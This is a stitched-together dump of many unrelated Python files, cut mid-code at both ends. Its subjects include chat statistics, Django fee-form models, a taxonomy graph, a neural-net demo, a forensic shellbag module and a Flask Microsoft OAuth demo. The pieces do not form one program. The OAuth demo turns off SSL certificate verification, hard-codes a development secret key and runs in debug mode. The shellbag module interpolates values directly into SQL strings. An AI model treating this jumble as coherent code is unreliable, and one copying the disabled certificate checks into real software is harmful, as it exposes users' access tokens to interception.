lenght if tsunamy & Tsunami.ECOLOGY: messagesDataTsunamy['ecology'][id] += lenght if tsunamy & Tsunami.TECHNOLOGY: messagesDataTsunamy['technology'][id] += lenght users = [] for mess in resultMess['messages']: users.append(mess['u']['_id']) usersDistinct = set(users) dataUsers.append(len(usersDistinct)) else: dataUsers.append(0) begin = end end = begin + monthdelta(1) color = getColor() messageByChannel = { "label": channel['name'], "backgroundColor": color, "data": dataMess } userByChannel = { "label": channel['name'], "backgroundColor": color, "data": dataUsers } messagesByChannel.append(messageByChannel) usersByChannel.append(userByChannel) if channels['count'] + channels['offset'] >= channels['total']: break index += channels['count'] # Récupération du répertoire racine du repo rootFolder = os.path.join(os.path.dirname(__file__), '..') # Répertoire pour stocker le fichier de sortie dataFolder = os.path.join(rootFolder, 'public', 'data') statsFilePath = os.path.abspath( os.path.join(dataFolder, 'channelsstat.json')) with open(statsFilePath, "w") as file_write: json.dump(info, file_write) from app import logger from goals import * from models import * class LoopActionGoal(ActionGoal): """Goal for adding a loop action""" def __init__(self, context, loop=None, condition=None, action=None): super().__init__(context) self.loop_actions = [] self.todos = [GetLoopActionsGoal(self.context, self.loop_actions)] self.setattr("action", action) self.setattr("condition", condition) self.setattr("loop", loop) def complete(self): assert hasattr(self, "actions") self.actions.append(LoopAction(self.loop, self.condition, self.loop_actions)) return super().complete() def advance(self): logger.debug(f"Advancing {self.__class__.__name__}...") self._message = None if self.todos: todo = self.todos.pop() todo.advance() if todo.error: if isinstance(todo, GetConditionGoal): self.error = todo.error else: self._message = todo.error return if todo.is_complete: todo.complete() else: self.todos.append(todo) def setattr(self, attr, value): if attr == "action" and value: setattr(value, "actions", self.loop_actions) if value.error: self.error = value.error elif value.is_complete: value.complete() else: self.todos[0].todos.append(value) return elif attr == "condition": if value is None: self.todos.append(GetConditionGoal(self.context, self)) elif isinstance(value, UntilStopCondition): self.loop = "until" self.condition = value elif value.variable.variable not in self.variables: self.error = f"Variable {value.variable.variable} used in the condition hasn't been created yet. Please try again or create the variable first." elif isinstance(value.value, ValueOf) and value.value.variable not in self.variables: self.error = f"Variable {value.value.variable} used in the condition hasn't been created yet. Please try again or create the variable first." elif isinstance(value, ComparisonCondition): if isinstance(value.value, str): if value.value in self.variables: value.value = ValueOf(value.value) self.condition = value else: self.error = f"The value {value.value} is not a number, so I cannot compare. Please try again." else: self.condition = value else: self.condition = value return elif attr == "loop": assert value is not None self.loop = value return setattr(self, attr, value) from django.db import models from django.utils import timezone class LibraryFine(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='library_fines') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) book_count = models.IntegerField(default=1) amount_fined = models.IntegerField(default=0) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class ShahparanHall(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='shahparan_hall_fine') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) father_name = models.CharField(max_length = 50,default="") mother_name = models.CharField(max_length = 50,default="") villagep = models.CharField(max_length = 50,default="") postp = models.CharField(max_length = 50,default="") thanap = models.CharField(max_length = 50,default="") zillp = models.CharField(max_length = 50,default="") villagec = models.CharField(max_length = 50,default="") postc = models.CharField(max_length = 50,default="") thanc = models.CharField(max_length = 50,default="") zillc = models.CharField(max_length = 50,default="") hons_first = models.CharField(max_length = 50,default="") firstst_cgpa = models.IntegerField(default=0) first_credit = models.IntegerField(default=0) second_cgpa = models.IntegerField(default=0) second_credit = models.IntegerField(default=0) third_cgpa = models.IntegerField(default=0) third_credit = models.IntegerField(default=0) fourth_cgpa = models.IntegerField(default=0) fourth_credit = models.IntegerField(default=0) bank_money = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) bank_no = models.IntegerField(default=0) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class Transcript(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='transcript') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) honors_reg = models.IntegerField(default=0) ms_reg = models.IntegerField(default=0) discipline = models.CharField(max_length = 100, default = "") exam_name_date = models.CharField(max_length = 100,default="") address = models.CharField(max_length = 200, default="") def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class Gradesheet(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='gradesheet') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) honors_reg = models.IntegerField(default=0) discipline = models.CharField(max_length = 100, default = "") school = models.CharField(max_length = 100, default = "") exam_name_date = models.CharField(max_length = 100,default="") cgpa = models.DecimalField(max_digits = 2, decimal_places=2,default=0) letter = models.CharField(max_length=2,default="") address = models.CharField(max_length = 200, default="") nationlaity = models.CharField(max_length = 30,default="Bangladeshi") def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class CashMemo(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='cash_memo') date = models.DateTimeField(default=timezone.now) #Memo Fields account_no = models.IntegerField(default=0) branch = models.CharField(max_length = 30,default="") name = models.CharField(max_length = 30,default="") money1 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) moeny2 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) money3 = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 15, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class S2(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='s_2') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) #S2 Fields admission_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) tution_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) union_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) reg_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) welfare_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) library_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) computer_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) rover_scout = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) bncc = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) travel = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) hall_seet = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) other = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) meical_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) id_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) book_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) festival_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) syllabus_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) diary_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) marksheet_fee = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) fine = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra1 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra2 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra3 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra4 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra5 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title class STD6(models.Model): G_CHOICES = (('1','Male'),('2','Female')) user = models.ForeignKey('allauthdemo_auth.DemoUser',related_name='std_6') date = models.DateTimeField(default=timezone.now) gender = models.CharField(max_length=1,choices = G_CHOICES,default=1) #STD-6 Fields total_theory = models.IntegerField( blank=True,null=True) total_lab = models.IntegerField(blank=True,null=True) exam_theory = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) exam_lab = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) drop_theory = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) drop_lab = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) certiricate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) duplicate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) registration_late = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) non_colligiate = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) course_modificatoin = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) other = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra1 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra2 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra3 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra4 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) extra5 = models.DecimalField(max_digits = 5, decimal_places=2,blank=True, null=True) total = models.DecimalField(max_digits = 10, decimal_places=2,blank=True, null=True) created_date = models.DateTimeField( default=timezone.now) published_date = models.DateTimeField( blank=True, null=True) def publish(self): self.published_date = timezone.now() self.save() # def __str__(self): # return self.title#!/usr/bin/env python from __future__ import print_function # batteries import os import sys import gzip import bz2 import argparse import logging import csv import urllib.request import codecs from collections import OrderedDict class Graph(object): def __init__(self, graph_dict=None): """ initializes a graph object If no dictionary or None is given, an empty dictionary will be used """ self.__ranks = {'d__' : 'superkingdom', 'p__' : 'phylum', 'c__' : 'class', 'o__' : 'order', 'f__' : 'family', 'g__' : 'genus', 's__' : 'species'} if graph_dict == None: graph_dict = {} self.__graph_dict = graph_dict self.__graph_nodeIDs = {} self.__seen = {} def vertices(self): """ returns the vertices of a graph """ return list(self.__graph_dict.keys()) def edges(self): """ returns the edges of a graph """ return self.__generate_edges() def add_vertex(self, vertex): """ If the vertex "vertex" is not in self.__graph_dict, a key "vertex" with an empty list as a value is added to the dictionary. Otherwise nothing has to be done. """ if vertex not in self.__graph_dict: self.__graph_dict[vertex] = [] self.__graph_nodeIDs[vertex] = len(self.__graph_nodeIDs.keys())+1 def add_edge(self, vertex1, vertex2): """ assumes that edge is of type set, tuple or list; between two vertices can be multiple edges! """ try: self.__graph_dict[vertex1].append(vertex2) except KeyError: self.__graph_dict[vertex1] = [vertex2] def __generate_edges(self): """ A static method generating the edges of the graph "graph". Edges are represented as sets with one (a loop back to the vertex) or two vertices """ edges = [] for vertex in self.__graph_dict: for neighbour in self.__graph_dict[vertex]: if {neighbour, vertex} not in edges: edges.append({vertex, neighbour}) return edges def __str__(self): res = "vertices: " for k in self.__graph_dict.keys(): res += str(k) + " " res += "\nvertex UIDs: " for k in self.__graph_dict: res += str(self.__graph_nodeIDs[k]) + " " res += "\nedges: " for edge in self.__generate_edges(): res += str(edge) + " " return res def get_rank(self, vertex): """ Getting rank based on GTDB prefixes """ return self.__ranks.get(vertex[0:3], 'subspecies') def iter_graph(self, vertex): """ General iteration of all nodes in the graph """ if vertex == 'root': self.__seen = {} for child in self.__graph_dict[vertex]: if child not in self.__seen: print('Parent: {}; Child: {}'.format(vertex, child)) self.iter_graph(child) self.__seen[child] = 1 def _write_dmp_iter(self, vertex, names, nodes, embl_code='XX'): for child in self.__graph_dict[vertex]: if child in self.__seen: continue self.__seen[child] = 1 # names names.append([str(self.__graph_nodeIDs[child]), child, '', 'scientific name']) # nodes rank = self.get_rank(child) nodes.append([self.__graph_nodeIDs[child], self.__graph_nodeIDs[vertex], rank, embl_code, 0, 0, 11, 1, 1, 0, 0, 0]) # children self._write_dmp_iter(child, names, nodes, embl_code) def write_dmp(self, outdir='.', embl_code='XX'): """ Writing names.dmp & nodes.dmp """ names_file = os.path.join(outdir, 'names.dmp') nodes_file = os.path.join(outdir, 'nodes.dmp') # iterating over all vertices starting at the root ## writing root ### names names = [[str(self.__graph_nodeIDs['root']), 'all', '', 'synonym']] names.append([str(self.__graph_nodeIDs['root']), 'root', '', 'scientific name']) ### nodes nodes = [[self.__graph_nodeIDs['root'], 1, 'no rank', embl_code, 0, 0, 11, 1, 1, 0, 0, 0]] ## Child names & nodes self._write_dmp_iter('root', names, nodes, embl_code) # Sorting by taxID & writing ## names with open(names_file, 'w') as outName: for x in sorted(names, key = lambda x: int(x[0])): outName.write('\t|\t'.join(x) + '\t|\n') ## nodes with open(nodes_file, 'w') as outNode: for x in sorted(nodes, key = lambda x: x[0]): outNode.write('\t|\t'.join([str(xx) for xx in x]) + '\t|\n') return names_file, nodes_file def _to_tbl_iter(self, vertex): for child in self.__graph_dict[vertex]: if child in self.__seen: continue self.__seen[child] = 1 # tbl row x = [str(self.__graph_nodeIDs[child]), child, self.get_rank(child)] print('\t'.join(x)) # children self._to_tbl_iter(child) def to_tbl(self): """ Writing table of values [taxID, name, rank] """ ## writing header x = ['taxID', 'name', 'rank'] print('\t'.join(x)) ## writing root self.__seen = {} x = [str(self.__graph_nodeIDs['root']), 'root', 'no rank'] print('\t'.join(x)) self._to_tbl_iter('root') def _to_tbl_iter_idx(self, vertex, idx): for child in self.__graph_dict[vertex]: if child in self.__seen: continue self.__seen[child] = 1 # tbl row idx[child] = str(self.__graph_nodeIDs[child]) # children self._to_tbl_iter_idx(child, idx) def append_tbl(self, table_file, join_column): """ appending to table """ # creating index: name : [taxID, rank] idx = {} self.__seen = {} idx['root'] = str(self.__graph_nodeIDs['root']) self._to_tbl_iter_idx('root', idx) # appending to file out_file = os.path.splitext(table_file)[0] + '_wTaxIDs.tsv' header = OrderedDict() with open(table_file) as inF, open(out_file, 'w') as outF: for i,line in enumerate(inF): line = line.rstrip().split('\t') if i == 0: header = {x:i for i,x in enumerate(line)} header['gtdb_taxid'] = len(header.keys()) + 1 if not join_column in header.keys(): msg = 'Cannot find column "{}" in file: {}' raise ValueError(msg.format(join_column, table_file)) outF.write('\t'.join(header) + '\n') else: acc = line[header[join_column]] try: line.append(idx[acc]) except KeyError: msg = 'Cannot find "{}" in the taxID index' logging.info(msg.format(acc)) line.append('NA') outF.write('\t'.join(line) + '\n') logging.info('File written: {}'.format(out_file)) def find_all_paths(self, start_vertex, end_vertex, path=[]): """ find all paths from start_vertex to end_vertex in graph """ graph = self.__graph_dict path = path + [start_vertex] if start_vertex == end_vertex: return [path] if start_vertex not in graph: return [] paths = [] for vertex in graph[start_vertex]: if vertex not in path: extended_paths = self.find_all_paths(vertex, end_vertex, path) for p in extended_paths: paths.append(p) return paths """Entity Xplora® Watch.""" from __future__ import annotations import logging from datetime import timedelta from typing import Any, Dict from homeassistant.components.switch import SwitchEntity from homeassistant.helpers.restore_state import RestoreEntity from .helper import XploraUpdateTime from pyxplora_api import pyxplora_api_async as PXA _LOGGER = logging.getLogger(__name__) class XploraSwitchEntity(XploraUpdateTime, SwitchEntity, RestoreEntity): def __init__( self, switch: Dict[str, Any], controller: PXA.PyXploraApi, scan_interval: timedelta, start_time: float, name: str, func_name: str, icon: str, ) -> None: super().__init__(scan_interval, start_time) _LOGGER.debug(f"init switch {func_name} {name}") self._controller: PXA.PyXploraApi = controller self._switch = switch self._attr_icon = icon self._attr_is_on = self._state(self._switch["status"]) self._attr_name = name self._attr_unique_id = switch["id"] def _state(self, status: str) -> bool: if status == "DISABLE": return False return True @property def extra_state_attributes(self) -> dict[str, Any]: """Return supported attributes.""" days = ["So", "Mo", "Di", "Mi", "Do", "Fr", "Sa"] weekRepeat = self._switch["weekRepeat"] weekDays = [] for day in range(len(weekRepeat)): if weekRepeat[day] == "1": weekDays.append(days[day]) return {"Day(s)": ", ".join(weekDays)} from model.model import RedshiftClassifierResNet, RedshiftClassifierInception from model.eval_model import eval_models from train import train_model from pickle import load train_data_file = <TRAIN_DATA_LOC> test_data_file = <TEST_DATA_LOC> results_file = <SAVE_LOC> with open(train_data_file,'rb') as pkl: train_imgs = load(pkl) train_labels = load(pkl) image_shape = (64,64,5) num_classes = 32 epochs = 20 max_val=0.4 models = [ RedshiftClassifierResNet(image_shape, num_classes), RedshiftClassifierInception(image_shape, num_classes) ] model_labels = [ 'resnet', 'incep' ] data_label = 'SDSS' for i, mod in enumerate(models): train_model(mod, train_imgs, train_labels, model_labels[i], data_label, epochs=epochs, max_rs_val=max_val) model_dirs = ['model/saved/'+lab+'/' for lab in model_labels] eval_models(models, test_data_file, model_dirs, model_labels, results_file, max_val)from ..base import ComparerMixin from ..MatchingResult import MatchingResult, MatchingType import Levenshtein class TokenCategoryComparer(ComparerMixin): def compare(self, lhs, rhs, original_lhs, original_rhs, **parameters): abbreviations_lhs = lhs[0] company_words_lhs = lhs[1] abbreviations_rhs = rhs[0] company_words_rhs = rhs[1] number_of_entity_words = len(abbreviations_lhs) + len(company_words_lhs) + len(abbreviations_rhs) + len(company_words_rhs) if number_of_entity_words > parameters.get("maximal_entity_words_unmatched", 1): return MatchingResult.NoMatch() if number_of_entity_words > 0: self.additional_flag = MatchingType.Additional <gh_stars>0 # input the number of items in group a and b from collections import defaultdict # d = defaultdict(list) # a, b = map(int, input().split()) # list1 = [] # # # defaultdict(<class 'list'>, {'a': [1, 2, 4], 'b': [3, 5]}) # for i in range(a): # d[input()].append(i+1) # # for i in range(b): # list1 += input() # # for i in list1: # if i in d: # print(" ".join(map(str, d[i]))) # else: # print(-1) n, m = map(int, input().split()) d = defaultdict(list) for i in range(1, n + 1): d[input()].append(str(i)) print(d) for i in range(m): print(' '.join(d[input()]) or -1) """ Author: <NAME>: <EMAIL> Website: http://valeriovelardo.com Python AI mailing list (free AI and ML tutorials): https://bit.ly/2K4gqE5 This file contains an implementation of a simple feedforward neural network. """ # Remember to pip install the numpy library, if you haven't downloaded it # already! import numpy as np class FeedForwardNet(object): """A class that represents a simple feedforward neural network, with an input layer, a hidden layer and an output layer. The layers are fully connected:each neuron of a layer, is connected with all the neurons of the following layer. """ def __init__(self, x, y, numNeuronsHiddenLayer=5): """Class constructor Args: x (numpy array): Training input data in the form of a 2d array y (numpy array): Training output represented as a 2d array numNeuronsHiddenLayer (int): Number of neurons of the hidden layer of the network. Defaulted to 5. """ super(FeedForwardNet, self).__init__() # training input data self.input = x # get number of input neurons from training data numInputNeurons = self.input.shape[1] # randomise weights between input and hidden layer self.weights1 = np.random.rand(numInputNeurons, numNeuronsHiddenLayer) # randomise weights between hidden and output layer self.weights2 = np.random.rand(numNeuronsHiddenLayer,1) self.y = y # initialise output of the network with all zeros self.output = np.zeros(self.y.shape) def feedforward(self): """Apply feedforward propagation.""" # calculate dot product between input layer and 1st layer of weights dotProductLayer1 = np.dot(self.input, self.weights1) # apply sigmoid activation function self.layer1 = self._sigmoid(dotProductLayer1) # calculate dot product between hidden layer and 2nd layer of weights dotProductLayer2 = np.dot(self.layer1, self.weights2) # apply sigmoid activation function self.output = self._sigmoid(dotProductLayer2) def backpropagation(self): """Propagate the error back, and update weights and biases. Sum of square errors is used as the loss function.""" # calculate the derivative of the loss function with respect to # weights2 d_loss_function2 = (2*(self.y - self.output) * self._sigmoid_derivative(self.output)) d_weights2 = np.dot(self.layer1.T, d_loss_function2) # calculate the derivative of the loss function with respect to # weights1 d_loss_function1 = (np.dot(2*(self.y - self.output) * self._sigmoid_derivative(self.output), self.weights2.T) * self._sigmoid_derivative(self.layer1)) d_weights1 = np.dot(self.input.T, d_loss_function1) # update the weights with the derivative of the loss function self.weights1 += d_weights1 self.weights2 += d_weights2 def train(self, epochs): """Train network using feedforward and back propagations. Args: epochs (int): Number of times we process the training data """ for _ in range(epochs): self.feedforward() self.backpropagation() def _sigmoid(self, x): return 1.0 / (1 + np.exp(-x)) def _sigmoid_derivative(self, x): return x * (1.0 - x) if __name__ == "__main__": # training set for logic 'and' x = np.array([[0, 0], [0, 1], [1, 0], [1, 1]]) # training output y = np.array([[0],[0],[0],[1]]) # instantiate neural net ffn = FeedForwardNet(x,y) # train for 1500 epochs ffn.train(1500) print(ffn.output) #!/usr/bin/env python -*- coding: utf-8 -*- import argparse import codecs import utils from sklearn.decomposition import PCA from sklearn.utils import shuffle from numpy import stack, dot, save if __name__ == "__main__": parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('-m', '--model', required=True, help='gensim LSA or word2vec binary model') parser.add_argument('-t', '--type', required=True, help='model type: lsa, w2v') parser.add_argument('-p', '--positive', required=True, help='positive word seeds file') parser.add_argument('-n', '--negative', required=True, help='negative word seeds file') parser.add_argument('-r', '--ratio', required=False, type=float, default=1.0, help='sample ratio') parser.add_argument('-k', '--number', required=False, type=int, default=10, help='number of components to keep') parser.add_argument('-c', '--components', required=True, help='output principal components') parser.add_argument('-s', '--similarity', required=False, default="cosine", help='similarity metric: cosine, dot') parser.add_argument('-i', '--incomponents', required=False, help='input subspace components (.npy)') args = parser.parse_args() vsm = utils.VSM(args.type, args.model, args.incomponents) positive_words = set(line.strip() for line in codecs.open(args.positive,'rb','utf8') if line.strip() in vsm) negative_words = set(line.strip() for line in codecs.open(args.negative,'rb','utf8') if line.strip() in vsm) vsm_array = vsm.get_array(list(positive_words)+list(negative_words)) X = stack(vsm_array) if args.similarity == "cosine": for i in xrange(X.shape[0]): X[i] = utils.unitvec(X[i]) pca = PCA(n_components=args.number) pca.fit(shuffle(X, n_samples=int(len(vsm_array)*args.ratio))) print('explained variance ratio: %s' % str(pca.explained_variance_ratio_)) for i in xrange(args.number): postive_sum = 0 for x in X[0:len(positive_words)]: postive_sum += dot(pca.components_[i], x) if postive_sum < 0: pca.components_[i] = -pca.components_[i] save(args.components, pca.components_)<reponame>dfrc-korea/carpe<filename>modules/shellbag_connector.py # -*- coding: utf-8 -*- """module for shellbags.""" import os from modules import manager from modules import interface from modules.OverTheShellbag import OverTheShellbag as shellbag class ShellbagConnector(interface.ModuleConnector): NAME = 'shellbag_connector' DESCRIPTION = 'Module for Shellbag' _plugin_classes = {} def __init__(self): super(ShellbagConnector, self).__init__() def Connect(self, par_id, configuration, source_path_spec, knowledge_base): this_file_path = os.path.dirname(os.path.abspath(__file__)) + os.sep + 'schema' + os.sep + 'registry' + os.sep yaml_list = [this_file_path + 'lv1_os_win_reg_shellbag.yaml'] table_list = ['lv1_os_win_reg_shellbag'] if not self.check_table_from_yaml(configuration, yaml_list, table_list): return False # This is not OS partition if len(knowledge_base._user_accounts.values()) == 0: # print("There are no Registry") return False # TODO file path list를 뽑아야함 username = list() for user_accounts in knowledge_base._user_accounts.values(): for hostname in user_accounts.values(): if hostname.identifier.find('S-1-5-21') == -1: continue username.append(hostname.username) query_separator = self.GetQuerySeparator(source_path_spec, configuration) path_separator = self.GetPathSeparator(source_path_spec) for user in username: filepath = f'root{query_separator}Users{query_separator}{user}{query_separator}' \ f'AppData{query_separator}Local{query_separator}Microsoft{query_separator}Windows' query = f"SELECT name, parent_path FROM file_info WHERE par_id = '{par_id}' and " \ f"((name like 'UsrClass.dat' and parent_path like '{filepath}') or " \ f"(name like 'UsrClass.dat.LOG1' and parent_path like '{filepath}') or " \ f"(name like 'UsrClass.dat.LOG2' and parent_path like '{filepath}'))" results = configuration.cursor.execute_query_mul(query) if len(results) == 0 or results == -1: #print("There are no shellbag files") return False file_objects = { "primary": None, "log1": None, "log2": None } for file in results: if file[0] == 'UsrClass.dat' or file[0] == 'usrClass.dat': file_objects['primary'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) elif file[0] == 'UsrClass.dat.LOG1' or file[0] == 'usrClass.dat.LOG1': file_objects['log1'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) elif file[0] == 'UsrClass.dat.LOG2' or file[0] == 'usrClass.dat.LOG2': file_objects['log2'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) shellbag_results = shellbag.Main(file_objects) # if file_objects['primary']: # file_objects['primary'].close() # if file_objects['log1']: # file_objects['log1'].close() # if file_objects['log2']: # file_objects['log2'].close() info = [par_id, configuration.case_id, configuration.evidence_id, user] insert_shellbag_info = [] for item in shellbag_results: item[3] = configuration.apply_time_zone(item[3], knowledge_base.time_zone) # modification_time item[4] = configuration.apply_time_zone(item[4], knowledge_base.time_zone) # access_time item[5] = configuration.apply_time_zone(item[5], knowledge_base.time_zone) # creation_time item[6] = configuration.apply_time_zone(item[6], knowledge_base.time_zone) # last_written_time item = info + item insert_shellbag_info.append(tuple(item)) query = f"Insert into {table_list[0]} values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);" configuration.cursor.bulk_execute(query, insert_shellbag_info) manager.ModulesManager.RegisterModule(ShellbagConnector) <gh_stars>0 from flask import Flask, redirect, url_for, session, request, jsonify, render_template from flask_oauthlib.client import OAuth, OAuthException import requests # from flask_sslify import SSLify from logging import Logger import uuid # disable ssl cert check import ssl from flask_oauthlib.client import OAuth, prepare_request, http def net_http_request(uri, headers=None, data=None, method=None): ''' Method for monkey patching 'flask_oauthlib.client.OAuth.http_request' This version allows for insecure SSL certificates ''' uri, headers, data, method = prepare_request( uri, headers, data, method ) req = http.Request(uri, headers=headers, data=data) req.get_method = lambda: method.upper() try: resp = http.urlopen(req, context=ssl._create_unverified_context()) content = resp.read() resp.close() return resp, content except http.HTTPError as resp: content = resp.read() resp.close() return resp, content app = Flask(__name__) # sslify = SSLify(app) app.debug = True app.secret_key = 'development' oauth = OAuth(app) # Put your consumer key and consumer secret into a config file # and don't check it into github!! microsoft = oauth.remote_app( 'microsoft', #consumer_key='Your microsoft application id. refer the readme', #consumer_secret='Your microsoft applicaiton password. refer the readme', consumer_key='<KEY>', consumer_secret='<KEY>', request_token_params={'scope': 'offline_access User.Read Notes.Read Notes.Read.All Notes.ReadWrite.CreatedByApp Notes.Create Notes.ReadWrite.All'}, base_url='https://graph.microsoft.com/v1.0/', request_token_url=None, access_token_method='POST', access_token_url='https://login.microsoftonline.com/common/oauth2/v2.0/token', authorize_url='https://login.microsoftonline.com/common/oauth2/v2.0/authorize', ) microsoft.http_request = net_http_request @app.route('/') def index(): return render_template('hello.html') @app.route('/login', methods=['POST', 'GET']) def login(): if 'microsoft_token' in session: return redirect(url_for('me')) # Generate the guid to only accept initiated logins guid = uuid.uuid4() session['state'] = guid return microsoft.authorize(callback=url_for('authorized', _external=True), state=guid) @app.route('/logout', methods=['POST', 'GET']) def logout(): session.pop('microsoft_token', None) session.pop('state', None) return redirect(url_for('index')) @app.route('/listNotebooks', methods=['GET']) def listNotebooks(): headers = { #'User-Agent' : 'python_tutorial/1.0', 'Authorization' : 'Bearer {0}'.format(session['microsoft_token'][0]) #'Accept' : 'application/json', #'Content-Type' : 'application/json' } request_id = str(uuid.uuid4()) instrumentation = {'client-request-id' : request_id, 'return-client-request-id' : 'true'} headers.update(instrumentation) url = "https://graph.microsoft.com/v1.0/me/onenote/notebooks" response = requests.get(url=url,headers=headers) print(response) return redirect(url_for('index')) @app.route('/login/authorized') def authorized(): response = microsoft.authorized_response() if response is None: return "Access Denied: Reason=%s\nError=%s" % ( response.get('error'), request.get('error_description') ) # Check response for state print("Response: " + str(response)) if str(session['state']) != str(request.args['state']): raise Exception('State has been messed with, end authentication') # Okay to store this in a local variable, encrypt if it's going to client # machine or database. Treat as a password. session['microsoft_token'] = (response['access_token'], '') return redirect(url_for('me')) @app.route('/me') def me(): me = microsoft.get('me') return render_template('me.html', me=str(me.data)) # If library is having trouble with refresh, uncomment below and implement refresh handler # see https://github.com/lepture/flask-oauthlib/issues/160 for instructions on how to do this # Implements refresh token logic # @app.route('/refresh', methods=['POST']) # def refresh(): @microsoft.tokengetter def get_microsoft_oauth_token(): return session.get('microsoft_token') if __name__ == '__main__': app.run(host='127.0.0.1', ssl_context='adhoc') # -*- coding: utf-8 -*- """Python package for audio analysis""" from soundly import metadata __version__ = metadata.version __author__ = metadata.authors[0] __license__ = metadata.license __copyright__ = metadata.copyright import time from testify import * import blueox class SimpleTestCase(TestCase): def test(self): context = blueox.Context('test', 1) with context: with blueox.timeit('test_time'): time.sleep(0.25) assert 1.0 > context.data['test_time'] > 0.0 snk(san(src(x))) <gh_stars>0 # python 3 # <NAME> """This python file will keep a record of all the functions created for cmip6 dataset analysis""" import numpy as np import datetime as dt def time_dim_dates(base_date = dt.date(1850,1,1) ,total_timestamps=3012): """this python function create a time or date values for 15th of \ every month from the start date,entered as year,month,day\ and until the timestamps or the length of the timeseries""" from calendar import monthrange import datetime as dt import numpy as np fd = base_date+dt.timedelta(14) #first date in the list dates_list = [fd] for i in range(total_timestamps-1): fd = 